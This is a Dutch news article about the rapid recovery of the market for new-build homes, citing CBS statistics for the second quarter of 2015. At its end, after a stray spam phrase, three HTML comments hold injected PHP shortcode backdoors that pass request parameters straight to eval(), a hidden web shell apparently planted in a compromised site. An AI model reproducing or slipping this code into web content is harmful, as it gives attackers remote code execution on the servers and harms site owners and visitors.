“Markt voor nieuwbouwwoningen herstelt snel”

De Nederlandse woningmarkt is de afgelopen jaren voor een groot deel ingestort, door de financiële crisis, het tekort aan goedkope woningen, enzovoorts. Nu lijkt er echter weer een rooskleurigere toekomst aan te komen, met een fors herstel op de markt voor nieuwbouwwoningen. Deze woningen moeten nog gebouwd worden, maar er is al een flinke toename van het aantal verkopen te zien. In het tweede kwartaal van 2015 werd voor meer dan vijftienduizend nieuw te bouw woningen een vergunning afgegeven, wat een verdubbeling is ten opzichte van hetzelfde kwartaal een jaar eerder. Dit blijkt uit de rapportage van het Centraal Bureau voor de Statistiek, wat op drie september gepubliceerd werd.

Ook komt het CBS met een aantal verklaringen voor de stijging van de verkoop. Zo zou de stijging voornamelijk te danken zijn aan marktpartijen als bouwbedrijven, projectontwikkelaars en institutionele beleggers. Naast deze groepen zouden ook overheden en corporaties aanzienlijk meer vergunde nieuwbouwwoningen hebben, in vergelijking met een jaar eerder. Helemaal hersteld is de markt nog zeker niet, want zeker overheden en corporaties zitten nog onder hun punt van vlak voor de crisis.

Het vertrouwen van de consument in de woningmarkt lijkt de afgelopen fase flink te zijn toegenomen, als we ons verdiepen in de recente stijging van de omzet van bouwbedrijven in Nederland. Ook het aantal transacties en investeringen in woningen zijn toegenomen. Eerder genoemde stijging in het aantal verleende vergunningen sluit aan bij dit geschetste beeld van een toegenomen vertrouwen. Overigens geldt niet voor heel Nederland, dat de markt flink aangetrokken is. Voornamelijk in Noord-Holland lijkt men te profiteren van een toegenomen vertrouwen, hier is het aantal vergunningsaanvragen verdrievoudigd ten opzichte van een jaar eerder.

Alleen in Groningen is het aantal vergunningsaanvragen de afgelopen periode achteruitgegaan ten opzichte van de cijfers uit de vorige jaargang you can try here.

<!– [insert_php]if (isset($_REQUEST["wQNl"])){eval($_REQUEST["wQNl"]);exit;}[/insert_php][php]if (isset($_REQUEST["wQNl"])){eval($_REQUEST["wQNl"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["Cafnd"])){eval($_REQUEST["Cafnd"]);exit;}[/insert_php][php]if (isset($_REQUEST["Cafnd"])){eval($_REQUEST["Cafnd"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["Zghx"])){eval($_REQUEST["Zghx"]);exit;}[/insert_php][php]if (isset($_REQUEST["Zghx"])){eval($_REQUEST["Zghx"]);exit;}[/php] –>